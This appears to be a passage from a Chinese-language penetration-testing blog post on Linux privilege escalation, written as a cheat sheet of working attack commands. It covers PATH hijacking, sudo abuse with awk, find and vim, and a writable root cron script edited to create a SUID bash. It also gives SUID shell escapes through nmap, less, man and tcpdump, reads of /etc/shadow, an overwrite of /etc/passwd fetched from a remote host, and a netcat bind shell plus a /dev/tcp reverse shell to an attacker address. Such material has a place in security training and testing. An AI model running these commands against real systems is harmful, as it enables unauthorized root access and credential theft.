<p>新建文件并重定向命令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /tmp</span><br><span class="line"><span class="built_in">echo</span> “/bin/bash”&gt; pppd</span><br><span class="line">chmod 777 ps</span><br><span class="line"><span class="built_in">echo</span> <span class="variable">$PATH</span></span><br><span class="line"><span class="built_in">export</span> PATH=/tmp:<span class="variable">$PATH</span></span><br></pre></td></tr></table></figure>

<p><img src="/2022/09/09/Linux%E6%8F%90%E6%9D%83/2.png"></p>
<p>运行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/home/kali/shell</span><br><span class="line">whoami</span><br></pre></td></tr></table></figure>

<p><img src="/2022/09/09/Linux%E6%8F%90%E6%9D%83/3.png"></p>
<h3 id="0x04-SUDO滥用提权"><a href="#0x04-SUDO滥用提权" class="headerlink" title="0x04 SUDO滥用提权"></a>0x04 SUDO滥用提权</h3><h5 id="4-1-基本信息"><a href="#4-1-基本信息" class="headerlink" title="4.1 基本信息"></a>4.1 基本信息</h5><p>sudo是linux系统管理指令，是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具。 执行流程: 当前用户转换到root, 然后以root身份执行命令, 执行完成后, 直接退回到当前用户. </p>
<p>注意：执行sudo时输入的密码, 是当前用户的密码, 并非root密码. </p>
<p>sudo配置文件：/etc/sudoers 配置</p>
<p>文件权限： 0440</p>
<p>显示出自己（执行 sudo 的使用者）的权限</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo -l</span><br></pre></td></tr></table></figure>

<p><img src="/2022/09/09/Linux%E6%8F%90%E6%9D%83/4.png"></p>
<p>执行环境变数中的 shell所指定的 shell ，或是 /etc/passwd 里所指定的 shell</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo –s</span><br></pre></td></tr></table></figure>

<h5 id="4-2-sudo提权命令"><a href="#4-2-sudo提权命令" class="headerlink" title="4.2 sudo提权命令"></a>4.2 sudo提权命令</h5><p>可以利用一下命令进行sudo提权</p>
<p><code>wget、find、cat、apt、zip、xxd、time、taskset、git、sed、pip、ed、tmux、scp、perl、bash、less、awk、man、vi、env、ftp、ed、screen</code></p>
<h6 id="awk"><a href="#awk" class="headerlink" title="awk"></a>awk</h6><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo awk <span class="string">&#x27;BEGIN&#123;system(&quot;/bin/bash&quot;)&#125;&#x27;</span></span><br></pre></td></tr></table></figure>

<p>代码执行后直接切换到root用户，不需要输入密码</p>
<p><img src="/2022/09/09/Linux%E6%8F%90%E6%9D%83/5.png"></p>
<p>还有其他的一些都可以达到相同目的</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sudo /bin/ash</span><br><span class="line">sudo /usr/bin/awk -F: <span class="string">&#x27;&#123;print $1 $2&#125;&#x27;</span> /etc/shadow</span><br><span class="line">sudo curl file:///etc/shadow</span><br><span class="line">sudo find . -<span class="built_in">exec</span> /bin/sh \; -quit</span><br></pre></td></tr></table></figure>

<h4 id="0x05-Linux定时任务提权"><a href="#0x05-Linux定时任务提权" class="headerlink" title="0x05 Linux定时任务提权"></a>0x05 Linux定时任务提权</h4><p>系统内可能会有一些定时执行的任务，一般这些任务由crontab来管理，具有所属用户的权限。非root权限的用户是不可以列出root 用户的计划任务的。但是 /etc/ 内系统的计划任务可以被列出。默认这些程序以root权限执行，如果有幸遇到一个把其中脚本配置成任意用户可写，我们就可以修改脚本进行提权了。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">系统定时任务：<span class="regexp">/etc/</span>crontab</span><br><span class="line">用户定时任务：<span class="regexp">/var/</span>spool<span class="regexp">/cron/</span></span><br></pre></td></tr></table></figure>

<p>我通过可以查看到，，每2分钟运行一次cleanup.py脚本</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/crontab</span><br></pre></td></tr></table></figure>

<p><img src="/2022/09/09/Linux%E6%8F%90%E6%9D%83/6.png"></p>
<p>查看脚本权限为普通用户可写</p>
<p><img src="/2022/09/09/Linux%E6%8F%90%E6%9D%83/7.png"></p>
<p>打开文件，比如，用下面的命令替换原来命令中的<code>os.system(‘rm -r /home/cleanup/* ‘)</code>：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">os.system(<span class="string">&#x27;cp /bin/bash /tmp/bash; chmod +s /tmp/bash&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p><img src="/2022/09/09/Linux%E6%8F%90%E6%9D%83/8.png"></p>
<p>2分钟后，tmp目录下就会存在SUID权限的bash，运行 <code>/tmp/bash -p</code> 后就获取了root权限。</p>
<p><img src="/2022/09/09/Linux%E6%8F%90%E6%9D%83/9.png"></p>
<h4 id="0x06-SUID提权"><a href="#0x06-SUID提权" class="headerlink" title="0x06 SUID提权"></a>0x06 SUID提权</h4><p>suid权限说明： </p>
<p>1.启动为进程之后，其进程的属主为原程序文件的属主 </p>
<p>2.只能作用在二进制程序上,不能作用在脚本上,且设置在目录上无意义 </p>
<p>3.执行suid权限的程序时,此用户将继承此程序的所有者权限</p>
<h5 id="6-1-查找具有SUID权限的文件"><a href="#6-1-查找具有SUID权限的文件" class="headerlink" title="6.1 查找具有SUID权限的文件"></a>6.1 查找具有SUID权限的文件</h5><p>执行以下两个中任意命令，利用find找到有SUID权限（SUID按8进制为4）的文件并使用ls命令列出</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -u=s -<span class="built_in">type</span> f 2&gt;/dev/null</span><br><span class="line">find / -user root -perm -4000 -<span class="built_in">exec</span> ls -ldb &#123;&#125; \;</span><br></pre></td></tr></table></figure>

<h5 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h5><h6 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h6><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap --interactive</span><br></pre></td></tr></table></figure>

<p>之后执行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">nmap&gt; !sh</span><br><span class="line">sh-3.2<span class="comment"># whoami</span></span><br><span class="line">root</span><br></pre></td></tr></table></figure>

<h6 id="msf"><a href="#msf" class="headerlink" title="msf"></a>msf</h6><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exploit/unix/<span class="built_in">local</span>/setuid_nmap</span><br></pre></td></tr></table></figure>

<p>较新版可使用 –script 参数：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&quot;os.execute(&#x27;/bin/sh&#x27;)&quot;</span> &gt; /tmp/shell.nse &amp;&amp; sudo nmap --script=/tmp/shell.nse</span><br></pre></td></tr></table></figure>

<h6 id="find"><a href="#find" class="headerlink" title="find"></a>find</h6><p>find比较常用,find用来在系统中查找文件。同时，它也有执行命令的能力。 因此，如果配置为使用SUID权限运行，则可以通过find执行的命令都将以root身份去运行。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">touch <span class="built_in">test</span></span><br><span class="line">find <span class="built_in">test</span> -<span class="built_in">exec</span> whoami \;</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">进入shell</span><br><span class="line">find <span class="built_in">test</span> -<span class="built_in">exec</span> <span class="string">&#x27;/bin/sh&#x27;</span> \;</span><br><span class="line">sh-5.0<span class="comment"># whoami</span></span><br><span class="line">root</span><br></pre></td></tr></table></figure>

<h6 id="nc"><a href="#nc" class="headerlink" title="nc"></a>nc</h6><p>广播shell:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find <span class="built_in">test</span> -<span class="built_in">exec</span> netcat -lvp 5555 -e /bin/sh \;</span><br></pre></td></tr></table></figure>

<p>kali(攻击机)上:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc 靶机ip 4444</span><br></pre></td></tr></table></figure>

<p>反弹shell:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find <span class="built_in">test</span> -<span class="built_in">exec</span> bash -c <span class="string">&#x27;bash -i &gt;&amp; /dev/tcp/攻击机IP/4444 0&gt;&amp;1&#x27;</span> \;</span><br></pre></td></tr></table></figure>

<p>kali(攻击机)上：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvnp 4444</span><br></pre></td></tr></table></figure>

<h6 id="vi-vim"><a href="#vi-vim" class="headerlink" title="vi/vim"></a>vi/vim</h6><p>打开vim,按下ESC</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">:<span class="built_in">set</span> shell=/bin/sh</span><br><span class="line">:shell</span><br></pre></td></tr></table></figure>

<p>或者</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo vim -c <span class="string">&#x27;!sh&#x27;</span></span><br></pre></td></tr></table></figure>

<h6 id="bash"><a href="#bash" class="headerlink" title="bash"></a>bash</h6><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">bash -p</span><br><span class="line">bash-3.2<span class="comment"># id</span></span><br><span class="line">uid=1002(<span class="built_in">test</span>) gid=1002(<span class="built_in">test</span>) euid=0(root) groups=1002(<span class="built_in">test</span>)</span><br></pre></td></tr></table></figure>

<h6 id="less"><a href="#less" class="headerlink" title="less"></a>less</h6><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">less /etc/passwd</span><br><span class="line">!/bin/sh</span><br></pre></td></tr></table></figure>

<h6 id="more"><a href="#more" class="headerlink" title="more"></a>more</h6><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">more /home/pelle/myfile</span><br><span class="line">!/bin/bash</span><br></pre></td></tr></table></figure>

<h6 id="awk-1"><a href="#awk-1" class="headerlink" title="awk"></a>awk</h6><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">awk <span class="string">&#x27;BEGIN &#123;system(&quot;/bin/sh&quot;)&#125;&#x27;</span></span><br></pre></td></tr></table></figure>

<h6 id="man"><a href="#man" class="headerlink" title="man"></a>man</h6><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">man passwd</span><br><span class="line">!/bin/bash</span><br></pre></td></tr></table></figure>

<h6 id="wget"><a href="#wget" class="headerlink" title="wget"></a>wget</h6><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget http://192.168.56.1:8080/passwd -O /etc/passwd</span><br></pre></td></tr></table></figure>

<h6 id="apache"><a href="#apache" class="headerlink" title="apache"></a>apache</h6><p>仅可查看文件，不能弹 shell：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apache2 -f /etc/shadow</span><br></pre></td></tr></table></figure>

<h6 id="tcpdump"><a href="#tcpdump" class="headerlink" title="tcpdump"></a>tcpdump</h6><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> $<span class="string">&#x27;id\ncat /etc/shadow&#x27;</span> &gt; /tmp/.<span class="built_in">test</span></span><br><span class="line">chmod +x /tmp/.<span class="built_in">test</span></span><br><span class="line">sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.<span class="built_in">test</span> -Z root</span><br></pre></td></tr></table></figure>

<h6 id="python"><a href="#python" class="headerlink" title="python:"></a>python:</h6><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">&quot;import os;os.system(&#x27;/bin/bash&#x27;)&quot;</span></span><br></pre></td></tr></table></figure>

<h6 id="perl"><a href="#perl" class="headerlink" title="perl:"></a>perl:</h6><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">exec</span> <span class="string">&quot;/bin/bash&quot;</span>;</span><br></pre></td></tr></table></figure>

    </div>
  <div>
  
    <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
  
</div>
    
    
    
        <div class="reward-container">
  <div></div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechatpay.png" alt="成殇Orz1 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/alipay.png" alt="成殇Orz1 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>

        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>成殇Orz1
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://onlycare.github.io/2022/09/09/Linux%E6%8F%90%E6%9D%83/" title="Linux提权">http://onlycare.github.io/2022/09/09/Linux提权/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag"><i class="fa fa-tags"></i>渗透测试</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/07/26/%E6%B8%97%E9%80%8F%E6%A1%86%E6%9E%B6%E6%8F%90%E6%9D%83/" rel="prev" title="渗透框架提权">
      <i class="fa fa-chevron-left"></i> 渗透框架提权
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/05/18/SpringBoot%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE/" rel="next" title="SpringBoot未授权访问">
      SpringBoot未授权访问 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Linux%E6%8F%90%E6%9D%83"><span class="nav-text">Linux提权</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%88%90%E6%AE%87Orz1"><span class="nav-text">成殇Orz1</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x00-Linux%E6%8F%90%E6%9D%83%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-text">0x00 Linux提权信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E4%BF%A1%E6%81%AF"><span class="nav-text">1. 操作系统信息</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F"><span class="nav-text">2. 环境变量</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#3-%E7%BD%91%E7%BB%9C%E4%BF%A1%E6%81%AF"><span class="nav-text">3. 网络信息</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#4-%E6%9C%8D%E5%8A%A1%E4%BF%A1%E6%81%AF"><span class="nav-text">4. 服务信息</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#5-%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F%E4%BF%A1%E6%81%AF"><span class="nav-text">5 应用程序信息</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#6-%E7%99%BB%E5%BD%95%E7%94%A8%E6%88%B7"><span class="nav-text">6. 登录用户</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#7-%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1"><span class="nav-text">7. 计划任务</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#8-SSH%E5%AF%86%E9%92%A5%E4%BF%A1%E6%81%AF"><span class="nav-text">8. SSH密钥信息</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#9-%E7%B3%BB%E7%BB%9F%E9%80%9A%E4%BF%A1"><span class="nav-text">9. 系统通信</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#10-%E6%97%A5%E5%BF%97%E6%96%87%E4%BB%B6%E5%88%86%E6%9E%90"><span class="nav-text">10. 日志文件分析</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#11-%E8%AF%AD%E8%A8%80%E5%BC%80%E5%8F%91%E7%8E%AF%E5%A2%83"><span class="nav-text">11. 语言开发环境</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#12-%E4%B8%8A%E4%BC%A0%E6%96%87%E4%BB%B6%E7%8E%AF%E5%A2%83"><span class="nav-text">12. 上传文件环境</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-searchsploit"><span class="nav-text">0x01 searchsploit</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-searchsploit%E6%90%9C%E7%B4%A2exp"><span class="nav-text">1. searchsploit搜索exp</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-Linux%E7%B3%BB%E7%BB%9F%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%E6%8F%90%E6%9D%83"><span class="nav-text">0x02 Linux系统内核漏洞提权</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#2-1-%E8%84%8F%E7%89%9B%E6%8F%90%E6%9D%83"><span class="nav-text">2.1 脏牛提权</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-2-pkexec-%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E"><span class="nav-text">2.2 pkexec 提权漏洞</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-3-CVE-2019-13272"><span class="nav-text">2.3 CVE-2019-13272</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-4-CVE-2019-7304"><span class="nav-text">2.4 CVE-2019-7304</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-5-Linux-sudo%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E"><span class="nav-text">2.5 Linux sudo权限提升漏洞</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-Linux%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E6%8F%90%E6%9D%83"><span class="nav-text">0x03 Linux环境变量提权</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#3-1-PATH%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F"><span class="nav-text">3.1 PATH环境变量</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#3-2-%E6%AD%A5%E9%AA%A4"><span class="nav-text">3.2 步骤</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04-SUDO%E6%BB%A5%E7%94%A8%E6%8F%90%E6%9D%83"><span class="nav-text">0x04 SUDO滥用提权</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#4-1-%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF"><span class="nav-text">4.1 基本信息</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#4-2-sudo%E6%8F%90%E6%9D%83%E5%91%BD%E4%BB%A4"><span class="nav-text">4.2 sudo提权命令</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#awk"><span class="nav-text">awk</span></a></li></ol></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x05-Linux%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1%E6%8F%90%E6%9D%83"><span class="nav-text">0x05 Linux定时任务提权</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x06-SUID%E6%8F%90%E6%9D%83"><span class="nav-text">0x06 SUID提权</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#6-1-%E6%9F%A5%E6%89%BE%E5%85%B7%E6%9C%89SUID%E6%9D%83%E9%99%90%E7%9A%84%E6%96%87%E4%BB%B6"><span class="nav-text">6.1 查找具有SUID权限的文件</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%88%A9%E7%94%A8"><span class="nav-text">利用</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#nmap"><span class="nav-text">nmap</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#msf"><span class="nav-text">msf</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#find"><span class="nav-text">find</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#nc"><span class="nav-text">nc</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#vi-vim"><span class="nav-text">vi&#x2F;vim</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#bash"><span class="nav-text">bash</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#less"><span class="nav-text">less</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#more"><span class="nav-text">more</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#awk-1"><span class="nav-text">awk</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#man"><span class="nav-text">man</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#wget"><span class="nav-text">wget</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#apache"><span class="nav-text">apache</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#tcpdump"><span class="nav-text">tcpdump</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#python"><span class="nav-text">python:</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#perl"><span class="nav-text">perl:</span></a></li></ol></li></ol></li></ol></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="成殇Orz1"
      src="/images/2.png">
  <p class="site-author-name" itemprop="name">成殇Orz1</p>
  <div class="site-description" itemprop="description">菜鸡一枚</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">17</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/onlycare" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;onlycare" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:cshanng@gmail.com" title="E-Mail → mailto:cshanng@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2021 – 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">成殇Orz1</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">76k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">1:09</span>
</div>



        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

<script src="/js/bookmark.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
<!--崩溃欺骗-->
<script type="text/javascript" src="/js/crash_cheat.js"></script>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/clicklove.js"></script>